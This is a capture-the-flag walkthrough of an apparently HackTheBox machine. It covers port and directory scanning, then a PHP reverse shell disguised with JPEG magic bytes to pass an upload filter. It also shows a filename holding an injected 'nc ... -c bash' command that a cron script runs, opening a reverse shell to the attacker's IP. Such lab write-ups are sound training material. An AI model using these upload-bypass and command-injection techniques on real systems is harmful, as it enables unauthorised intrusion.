As usual, we start with an nmap port scan. We see that the following ports are open:
- 22: SSH
- 80: HTTP
- 443: HTTPS
$ nmap 10.10.10.146
When viewing the HTTP landing page, we are notified that creators are intending to invent the new Facemash. Facemash was a page which Mark Zuckerberg and his mates created during university. Essentially, it would display two images and the user would have to identify which was more physically attractive. The creation of a new Facemash hints that there will be an uploads page somewhere. Let us return to this thought later.
We can preform a GoBuster scan to identify any pages which we could upload things to:
$ gobuster dir \ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \ -u http://10.10.10.146/ /uploads /backup
We inspect the
/uploads page, but we do not find anything there. So of course, we take a look at the
/backup page. On there is a suspicious tar file, named
backup.tar. We will have to download this file to inspect the files within.
$ wget http://10.10.10.146/backup/backup.tar $ tar -xvf backup.tar
It appears that it is a zip file of possible pages. We try to navigate to
photos.php and notice a lot of CentOS default photos. Additionally, when navigating to
upload.php we are prompted with a file uploader. Good news for us! Let’s inspect the
upload.php file first.
What happens is that the upload.php checks the magic bits of the uploaded file to validate that only images are being uploaded. If a file is valid, it will be uploaded and you can view it on the photos.php page.
Getting Initial Shell
We know we can upload pictures, however a reverse shell is not necessarily a picture. We can fool the file inspection by appending magic bits to the reverse shell file. In my case, I use the
.jpeg magic bits, which are
ff d8 to create a
magic-bits.jpeg file, to which I will append the php reverse shell. We can verify that this was successful by using
xxd to view the hexadecimal values of the beginning of the file.
$ echo "\xff\xd8" > magic-bits.jpeg $ cat php-reverse-shell.php >> magic-bits.jpeg $ cat magic-bits.jpeg | xxd | head -1
We can use the
magic-bits.jpeg file and upload it to the server, which will then be executed. And it works! We capture the initial reverse shell.
www-Data User Enumeration
We do not have permission to view
user.txt, it belongs to the guly user. However, we do have permission to read some other files in the
/home/guly/ directory. Most importantly, we inspect the
crontab.guly file. It regularly executes
check_attack.php. Perhaps we can exploit this!
Pivoting to Guly user
We must inspect the
check_attack.php file, and we see that watches files in the
/var/www/html/uploads/ directory. We can exploit this by creating a file with a semi-colon
; in the name, which will trick the check_attack.php to execute a further command. We must add
-c bash, because otherwise otherwise, just a regular connection would be opened; without the shell. We cannot do
-e /bin/bash because slashes (
/) are not allowed to be in filenames – it would not make sense. We wait a little bit, and then we capture the guly shell!
$ touch "; nc 10.10.14.37 -c bash"
As the guly user, we issue the
sudo -l command to identify possible files which could be executed as root. We see that we can execute a shell script as root user, without a password. Perhaps we can exploit this!
We execute it and with a little trial and error and some perseverance, we can spawn a root shell! Perhaps I should have reviewed the code itself. Nevertheless, we have made it!
This was a fun easy box for sure! I find it interesting that I didn’t interact with ports 22 (SSH) or 443 (HTTPS) at all, but I guess for the path that I took, they were not necessary.
Thanks to the creator!